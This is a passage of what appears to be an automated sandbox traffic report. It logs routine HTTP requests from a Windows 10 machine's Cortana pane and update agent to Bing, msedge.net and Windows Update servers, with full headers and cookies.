SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/LP9hwiqJSIzTqMBfw7Kzjq3wC9A.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /apc/trans.gif?87976b596980857850532fa909f51f1b HTTP/1.1host: b-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                    Source: global trafficHTTP traffic detected: GET /apc/trans.gif?98758aa62564c1822353726be6083611 HTTP/1.1host: b-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                    Source: global trafficHTTP traffic detected: GET /rp/Nc4fY9Bt2xiN12EeZpnY5mhtaHc.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /apc/trans.gif?62429672578152eea57f84aafc162f64 HTTP/1.1host: spo-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                    Source: global trafficHTTP traffic detected: GET /rp/OUJ6ahKp8erGgr7fmZPGFt5iOeQ.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /apc/trans.gif?456f89d19c3134a687f24503b7eb5933 HTTP/1.1host: spo-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                    Source: global trafficHTTP traffic detected: GET /rp/Q0J3WqtOxBbLnp5iTXu__jsZq6o.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /r.gif?MonitorID=asgw&rid=f90d9d78e1ee958148fa709861896dba&w3c=true&prot=https:&v=20190506&DATA=[{%22RequestID%22:%22b-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:677,%22T%22:1},{%22RequestID%22:%22b-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:130,%22T%22:1},{%22RequestID%22:%22spo-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:673,%22T%22:1},{%22RequestID%22:%22spo-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:131,%22T%22:1},{%22RequestID%22:%22t-ring-fdv2.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:-1,%22T%22:1}] HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                    Source: global trafficHTTP traffic detected: GET /rp/Q_a1-NQcI9jzDQWCGyf-VjN20v4.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/S-1Sin9hxjW1LkijyZiLBA_FHdk.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/TdECMV0TRBVEcANtOCAjiC_gQ1M.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Pc9yRwXsuKwAvOr&MD=xDHHawBU HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
                    Source: global trafficHTTP traffic detected: GET /rp/Uicjz5_Idvl9FRKtwKPHILZoadU.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/XUoKWXdZQS2iuOnv0a_-gwXn0RY.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/YdkRJN1Cgndw2b5FyfmuFrQJnME.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/Z9hYXc38AnqyLF2U6SIx7fPVgp0.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/ZGYsYc-4cfWAUrRQfDPHboO8Xgc.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/dXH4UJXiG6BhYx2KONGGI7yr8wE.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/dae1eD06shOtvLXODcWefBj-c4Q.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/eEeyUDaPc605RXeeN1fbn7yWGC0.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/hvBI6JcM3fiurYJTqWZEAiEc9uY.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/ir34uLC35WF1sY2N-nv7lDNxLng.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; 